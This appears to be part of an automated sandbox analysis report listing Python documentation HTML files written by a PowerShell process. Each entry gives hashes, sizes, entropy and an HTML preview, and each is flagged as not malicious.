                              SHA-512:A1179E29B5693377896A9F0750ABCDE215B91214FA079B1C90F6BC4902A5A2CCFE827F1A53F0E577DDAEF52E897E03FDB6266243E84509F55D5E2A6F2B804FE6
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python HOWTOs" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python HOWTOs are documents that cover a single, specific topic, and attempt to cover it fairly completely. Modelled on the Linux Documentation Project.s HOWTO collection, this collection is an eff..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python HOWTOs are documents that cover a single, specific topic, and
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (419), with CRLF line terminators
                              Category:dropped
                              Size (bytes):41277
                              Entropy (8bit):5.0365565615919
                              Encrypted:false
                              SSDEEP:768:Wkaqys3ZM5P/xvkpAJEbziroly2X0Y9FVSZXUmIn4+umHiI78hsZ8VMQ764N:Wqy+M53FkpAJEbzKolX9FVSZkmIn4+u/
                              MD5:A72217C16E879779860E7EBCEF74A53D
                              SHA1:FA7E185B37BB740DF3166012478BF3B8BDBCE53C
                              SHA-256:0F195A0220167939344A457349D159EFA8DCEBABC451270D26BEA5E765534BD4
                              SHA-512:9F2135127957E0B67521A879F7D3CD6D6E03D291505EDAB6E346E62231FA3FAFFC81D4BFCA59AD6D3A57F4BAEDC3823E30D28F3418EE15468C7AB6194319C7C5
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Instrumenting CPython with DTrace and SystemTap" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/instrumentation.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="author, David Malcolm,, author, .ukasz Langa,. DTrace and SystemTap are monitoring tools, each providing a way to inspect what the processes on a computer system are doing. They both use domain-spe..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="author, David Malcolm,, au
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (510), with CRLF line terminators
                              Category:dropped
                              Size (bytes):46693
                              Entropy (8bit):4.9826262432228585
                              Encrypted:false
                              SSDEEP:768:FRsqyCpGMgVdpU9Cn10PdhfhLXLkRth7kskTilo1S0MU764N:kqyfMg7pU9Cn10PdhfpXLOth7kskT+ob
                              MD5:840A0A3050E69F71BA65D2286F6DD661
                              SHA1:64BB476FFC72ED5D522F3FDE2F89CACDFF7D4731
                              SHA-256:C40908CF6523052F1FEDAA63FBAB74454C8C343AB000FADAC6AA1CC3A0BD8AAB
                              SHA-512:DC58C9BCA90F3652D89C94E5EE08BEEFB841E35B8E8CD14271D9AB3F7B80A63A0315C902CACF3758FFD0EDAD8625DF9A624012F5526743ED2B4944358676150C
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="An introduction to the ipaddress module" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/ipaddress.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="author, Peter Moody,, author, Nick Coghlan,. Overview: This document aims to provide a gentle introduction to the ipaddress module. It is aimed primarily at users that aren.t already familiar with ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="author, Peter Moody,, author, Nick Cogh
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (653), with CRLF line terminators
                              Category:dropped
                              Size (bytes):77211
                              Entropy (8bit):4.910184684889503
                              Encrypted:false
                              SSDEEP:1536:ARqytRn0MHeQFlbsdwKOWP1PdaT/8zDZHUhkxHZRYcMU764N:A5Rn3HlwdNfVVhZRYPg
                              MD5:75A7D6D9A7FD27B56B4F490465544AAE
                              SHA1:750464FD8F2E4DEC3A5551D96D3F53806413F940
                              SHA-256:9563C325280195BE7AA03BFEF516336C9662982392F7146795E19208AB69B893
                              SHA-512:6A62D354A01EE335B4EF9029986A58E17684064B7AF2A5B17C69F5FEC0639ADAF39312315FFA1157DD536C5DDA690C74297D89C48331B1CDF89772C8717ACEA5
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Isolating Extension Modules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/isolating-extensions.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Abstract: Traditionally, state belonging to Python extension modules was kept in C static variables, which have process-wide scope. This document describes problems of such per-process state and sh..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Abstract: Traditionally, state belonging t
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (915), with CRLF line terminators
                              Category:dropped
                              Size (bytes):126810
                              Entropy (8bit):4.874551014366687
                              Encrypted:false
                              SSDEEP:3072:cNSI64qHg5uuyUJacnkkHK08lOybocsKPPlg:1g5uuWRFg
                              MD5:5511244EB7C502A14EFE31B607E9B326
                              SHA1:1D9F704E061CD24430C955319CC85391DB8C631F
                              SHA-256:B40108D26C969D2EAEB7D8D8818289A645018D85E4894551F5615D962FF76A28
                              SHA-512:547790D92724A7B42863139D7B68F8D5F9C74D90DC5EFB80A33B315CF789B59A05575ECCE0360A250E0CC3459C95EBFE387B66718B664E57B7454B05882D9B5A
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Logging HOWTO" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/logging.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, Vinay Sajip <vinay_sajip at red-dove dot com>,. This page contains tutorial information. For links to reference information and a logging cookbook, please see Other resources. Basic Logging..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, Vinay Sajip <vinay_sajip at red-dove dot com>,. This page con
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2777), with CRLF line terminators
                              Category:dropped
                              Size (bytes):184369
                              Entropy (8bit):4.819509922014639
                              Encrypted:false
                              SSDEEP:1536:u0qyE5i2MDMeGLbyFMyV8yF7yGo1qRcBK2lbgI5dVrotB6x2fr9v7+SRSSCHa/Gf:EyRcNVOQhUdMOkvQrafUQXwVg
                              MD5:32E47972388AFA2EBD36B51F5AD790D8
                              SHA1:7CBF243E67495F656D4D9C10223C3AB47FD63679
                              SHA-256:04629F958F1CEA87E4F430D7E6C6D7D389E38AB8E477EE0BEE7461135498EB3C
                              SHA-512:114BAF69189D6B2A6DF10B78EB915A3FD7CE06BCA71BE7CE03D0124D2680906A22B411E8978549766676B81804636F14EC0523A5CFC71D65023187ED329B5DA2
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tarfile . Read and write tar archive files" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tarfile.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tarfile.py The tarfile module makes it possible to read and write tar archives, including those using gzip, bz2 and lzma compression. Use the zipfile module to read or write.zip fi..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tarfile.py The tarf
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (698), with CRLF line terminators
                              Category:dropped
                              Size (bytes):42809
                              Entropy (8bit):4.85380186253527
                              Encrypted:false
                              SSDEEP:768:bFmqxqyaAyOtMAZ44/v5BZL/E2n0isw4yFn17OmWRfc4wS/bCLLOBZD1KXwHWFTv:bFmqxqyazcMAaUv5BZLstisw4yF17OmV
                              MD5:151D4862D983D7F3C795C603CEBBA6E4
                              SHA1:61965417045BA72712BB1F9F3A383F2E83D688CD
                              SHA-256:02D9F455CD778104F87244AF6BAEAA108B82A8D1440FAF0086CD7BEBCA12C53F
                              SHA-512:1386C42F64B9649B8FAFA4D9CF0AB5816F8E8DE2A8ECD9D5ACB9FBC01F4D0F8F0AA6715970F8F0384AB90D7A07F1AA356AB0C887450707E9B2F18AA2EBF3B6A1
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="telnetlib . Telnet client" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/telnetlib.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/telnetlib.py The telnetlib module provides a Telnet class that implements the Telnet protocol. See RFC 854 for details about the protocol. In addition, it provides symbolic constan..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/telnetlib.py The telnetlib module
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2372), with CRLF line terminators
                              Category:dropped
                              Size (bytes):72952
                              Entropy (8bit):4.80867499232315
                              Encrypted:false
                              SSDEEP:1536:8qywM8EJy/y/tyZWyFfyFayFXyFMyFw4yFe7FvB/y/tyZWyFfyFayFXyFMyFAyTu:+U7FhxMnfoPGJXEbHg
                              MD5:1A5C2A77A41BC386D8DABCA97E8BAE35
                              SHA1:3D5822C98AB8140DC305CE8965748C6A9BFCFA0F
                              SHA-256:5C1D98D2203ABBCC25D4869C2420F790F8CD5ED33096754266AC6E7FB39403CB
                              SHA-512:54021126E3B286B997EEE9378148AB2AB4C6CE62107E23424862D2F9D3F29C849CDD08B7772210E9860A428717DCFBDB19EAEAA3F834E2580DFC0508954847A8
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tempfile . Generate temporary files and directories" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tempfile.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tempfile.py This module creates temporary files and directories. It works on all supported platforms. TemporaryFile, NamedTemporaryFile, TemporaryDirectory, and SpooledTemporaryFil..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tempfile.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (552), with CRLF line terminators
                              Category:dropped
                              Size (bytes):30002
                              Entropy (8bit):4.867085017967416
                              Encrypted:false
                              SSDEEP:768:9qy5TTMUTNLm6vmbqQQZ2CaBpmv/2m4amolCmRfBmtFmwPf63M0764N:9qydMUBLm6vmbqQQZ2CaBpmv/2m4amoF
                              MD5:AF1C94802A7F83054B45AA8B15E395C9
                              SHA1:2B9567446AADD90F4FBA4EC03240A6BE27523388
                              SHA-256:275176330CC6369D51B0B192886D52C42686C20DB080B33E3C8479879177F8C8
                              SHA-512:964B7841A6086D23D9D6C292F3B99E1A26266D746772EA38476A4E1CB2825082ED401AA8DB87D4FC328CAF820F3E585BA6257736AC7912F26CE8CDC568CA8A2F
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="termios . POSIX style tty control" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/termios.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This module provides an interface to the POSIX calls for tty I/O control. For a complete description of these calls, see termios(3) Unix manual page. It is only available for those Unix versions th..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This module provides an interface to the POSI
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1356), with CRLF line terminators
                              Category:dropped
                              Size (bytes):235935
                              Entropy (8bit):4.804529337244678
                              Encrypted:false
                              SSDEEP:3072:PgTY5VImmvYdOudOdYxVm4ipx08VrNuCO2y/bx6rg:zYmyZECOxb2g
                              MD5:3574C9FE5ABB061F71411719C6264460
                              SHA1:673B400B5B2E002E7AAC4D38ADD01C0304B1A473
                              SHA-256:B7EA00F483FFE68F4F71B6B86D2D5E4ADDF58914912FEE87A07B1B2294A9DC5A
                              SHA-512:B12565878DE8BA92835759936B5622164F4317421618639311312C554C650D1A38702B5268C215A717A3834C1F99C148AE90AE8B6049D6C0CA4DF5AE2C781185
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="test . Regression tests package for Python" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/test.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The test package contains all regression tests for Python as well as the modules test.support and test.regrtest. test.support is used to enhance your tests while test.regrtest drives the testing su..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The test package contains all regressio
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (375), with CRLF line terminators
                              Category:dropped
                              Size (bytes):20083
                              Entropy (8bit):4.8587934917166065
                              Encrypted:false
                              SSDEEP:192:W1ZgrtzKHqkX1vAMaMgWn6TMb1m/dqzVcHxQddSijrmMQ6CnYTMbQA76dqEC:qZPHqkll6Wn6TMga4w3CnYTML76dqEC
                              MD5:896A72194339F3DAA6DE4CFE61638B09
                              SHA1:3789BE78E4CD7271A2DC1357800577B734A95B6F
                              SHA-256:E78DA40A1FCBF7B0EB2F55174303D4A5A6AB5EB3C1BE4EE80F4A6A2E3C6B5D77
                              SHA-512:6163A0E4FD76341C54C592FF04702C91276D209ED210B96E5D0302A91DFA53B5BD98BECDBA8C1DAB71514BE5C4D3083DD6CC7E746E4672A951E4925E56D5A2F4
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Text Processing Services" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/text.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The modules described in this chapter provide a wide range of string manipulation operations and other text processing services. The codecs module described under Binary Data Services is also highl..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The modules described in this chapter provide a wide range
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2916), with CRLF line terminators
                              Category:dropped
                              Size (bytes):52950
                              Entropy (8bit):4.835990560413453
                              Encrypted:false
                              SSDEEP:1536:Rqy0MSjHTvy0wkylryl2yTTyTVyYPyTYyTsyTRyz5yFqyMjyTvy0wkylryl2yTTq:gOVOTBg
                              MD5:2C7D0CF0F1CFF5F6B67BA0805D105F4B
                              SHA1:88D8E3CBE188C4B8689902B939279545CC600706
                              SHA-256:87FE9AFD52AA7DBEECD0F3D8FBEB222007A74165032124A34BB102E120E13899
                              SHA-512:E4DF5DE5F0F6051F96642F26E5809374FBF7B7FB01DDE2FE05CCA5C6AC6D8329E80444DCBA9DA233EA7F4063EDB881C944A80201D14FF383EB0513EB8381278D
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="textwrap . Text wrapping and filling" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/textwrap.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/textwrap.py The textwrap module provides some convenience functions, as well as TextWrapper, the class that does all the work. If you.re just wrapping or filling one or two text st..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/textwrap.py The textwr
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1628), with CRLF line terminators
                              Category:dropped
                              Size (bytes):139755
                              Entropy (8bit):4.809143370049184
                              Encrypted:false
                              SSDEEP:1536:TqyvMMPij/J0dNpB/7VRuIpWBe10iOeAOLG3COggO7GXAvsxhRdwsc3pyFmyFsyj:Gj1TKhBDe5hqm6g
                              MD5:372EA1CC21E1BB6BB0D0B01D8F920D93
                              SHA1:38EFB9E7985B2F1257F3B9E4A1DF7A0B6C77C90E
                              SHA-256:B04C61B41104D52E6D2740DEF39A1CE8386120D026A4B4348C03BB144B3892A9
                              SHA-512:7DF6341FFDED95D85719C6DAE24634E7DFA8445CA023916A58ED3E7E7902AC84915F46A9107A7F761F36B45AECCA5D50A44C53A1959663860C0A2895246BB183
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="threading . Thread-based parallelism" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/threading.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/threading.py This module constructs higher-level threading interfaces on top of the lower level_thread module. CPython implementation detail: In CPython, due to the Global Interpre..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/threading.py This modul
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (673), with CRLF line terminators
                              Category:dropped
                              Size (bytes):119778
                              Entropy (8bit):4.8851791613587014
                              Encrypted:false
                              SSDEEP:1536:PqyZMnKXFA0pGauAITAUFpAJ9/Am84NJGiNAm8yrrUKFbbCrehriuWC9ODPe52oG:oWNJGz89YQhzYkJGPj+QqAog
                              MD5:28AE5D65559888950FBE2A094E857B87
                              SHA1:CE5BE0EAC5DE67748E2A11B9BD3D799CF0C09966
                              SHA-256:9722E392A1BB061CA7BC2287F68A6525F298E22CBFAC6F62D90D323457AD91AB
                              SHA-512:C5DA2B89F5B21184332DB2AAA2BE50A91CA5CEAEBC28DEFA95B9150D8F97F45AC40D8F8025032C18E99AB0EE48E688C086B8DDFDE060F7CC343F52EB7E518FA7
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="time . Time access and conversions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/time.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This module provides various time-related functions. For related functionality, see also the datetime and calendar modules. Although this module is always available, not all functions are available..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This module provides various time-related funct
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1079), with CRLF line terminators
                              Category:dropped
                              Size (bytes):58364
                              Entropy (8bit):4.867751699388175
                              Encrypted:false
                              SSDEEP:1536:4c+qyRMW632YYUzZgf229gOiAUQ229SgOdA3N0t222+O3dyI016DyFdPykyyIQXs:4cXNACA3+ZAQg
                              MD5:2FF6A564A76D02F1A2F599771FEF75B6
                              SHA1:40F3206584DD8E33843B164940439052EE3C5E97
                              SHA-256:D1D3DB601565EFD3ED768AA925E616AFE0B53C95720A6BB534B6CEEF2F1C415C
                              SHA-512:F79771EAA68DC6FCC749AE69B1D32BA528E433F3A85B8D5985A6BFD3B39C5DC004DB5DE7ED8824B2E924315EE91DA7ECFBCC629F1FD2AFCC2772A8A1364ED7CB
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="timeit . Measure execution time of small code snippets" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/timeit.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/timeit.py This module provides a simple way to time small bits of Python code. It has both a Command-Line Interface as well as a callable one. It avoids a number of common traps fo..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/timeit.p
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (512), with CRLF line terminators
                              Category:dropped
                              Size (bytes):31778
                              Entropy (8bit):4.869479044182296
                              Encrypted:false
                              SSDEEP:384:OuHqklbCMjn8vTMVEpVdnDKY6c3aWVLzAgs1CB1n8LTM476dqEC:OCqybCU8rM2ic3aUfs1Cf8vM4764N
                              MD5:AB08D4C1DC0100A93A5BA941DDF47D62
                              SHA1:5FC6EF0E71EC7890011A276BB70A96B6834FBF99
                              SHA-256:F43324655B42A3F731834659CDFA29EA45B32AAF705E47CF1366D625844D9AB8
                              SHA-512:EF955DA0E4B24D38CABB3F991BC2F8D0792E48C048B244C5BAB804CAC3A0E2F25CF356924EE9F5EBDBC3DA462D9D0650F5131010CCC64F6C440EB30AF91D99F4
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Graphical User Interfaces with Tk" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tk.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Tk/Tcl has long been an integral part of Python. It provides a robust and platform independent windowing toolkit, that is available to Python programmers using the tkinter package, and its extensio..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Tk/Tcl has long been an integral part of Python. It
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (737), with CRLF line terminators
                              Category:dropped
                              Size (bytes):17727
                              Entropy (8bit):4.839431230782822
                              Encrypted:false
                              SSDEEP:384:lzt0tdnHqkllo7npTMlbc2m6yFoa3f1yFoaBtdndTMF76dqEC:l5mdHqylgdMlA2m6yFoa3f1yFoaBnJM7
                              MD5:BC93A7D3396C670707F82AE1D625DFD9
                              SHA1:328E6E5181EEC0EDFC2CB51C1F157582468534D9
                              SHA-256:5D6E75095A360D353DB0FCD96792C8600C662B544EDA5649F1DB7189B767DECD
                              SHA-512:EB094C67FA7BFE86D881923F797324378D0E880970C0B120572FBB69001F1E1345EEAAE76F0AFBC650A42786C547AA593517834CB82E66D135C5431A526B5944
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tkinter.colorchooser . Color choosing dialog" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tkinter.colorchooser.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tkinter/colorchooser.py The tkinter.colorchooser module provides the Chooser class as an interface to the native color picker dialog. Chooser implements a modal color choosing dial..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tkin
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (560), with CRLF line terminators
                              Category:dropped
                              Size (bytes):20399
                              Entropy (8bit):4.88401708167782
                              Encrypted:false
                              SSDEEP:384:F6PHqklrmXnFTMPbNfUAQdtvoOyF3OCyL6OtOr6tvUJzhnJTMt76dqEC:2qyrcBMPhfUAQdtvoOyF3OCyL6OtOr6l
                              MD5:8D09E84106B152E889214860E1D6CFE5
                              SHA1:2F4C4A44BD1612C13FAD21FE448C896B9FD2BD62
                              SHA-256:6088734D3CF85FDA4E93B379BD16135B242A19A6539390CA3B22FF58DBF3DCA9
                              SHA-512:4C442F732DECBDAC90072B22589CB9FE4A7A7F02CC4D2653249540B37CC6841543B4836C9C808C8BA3A356E6478F7BEA71D7279AABC245089248D14057C6063F
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tkinter.dnd . Drag and drop support" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tkinter.dnd.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tkinter/dnd.py The tkinter.dnd module provides drag-and-drop support for objects within a single application, within the same window or between windows. To enable an object to be d..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tkinter/dnd.py The tki
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1298), with CRLF line terminators
                              Category:dropped
                              Size (bytes):25570
                              Entropy (8bit):4.872560761862971
                              Encrypted:false
                              SSDEEP:768:UOqyCyFLMInEg4xXVammcyF2yFsyF7yYoaobhyF8yFohajavST8yF5NaogDHfcyG:UOqydLMInEg4xXVammcyF2yFsyF7yYoq
                              MD5:F10EE74CCDF0B0155E7F3966AD012463
                              SHA1:C42740F265391E774158FAE9E3BE7740CF2CDC36
                              SHA-256:E4AE186E2597D0A87A89A5F32D17F65A9505BD7282DAAA37B2296F6B0E195324
                              SHA-512:3F1165602B9648FDA174FBE990E4CD42FF1241B77239E05994D1477C8A5EADD8E56D60B712A97B6389EC63B19DAF01405F933FEBFF95F0EB532F35C738BE493B
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tkinter.font . Tkinter font wrapper" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tkinter.font.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tkinter/font.py The tkinter.font module provides the Font class for creating and using named fonts. The different font weights and slants are:" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tkinter/font.py The tkinter.font module provides the Font clas
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
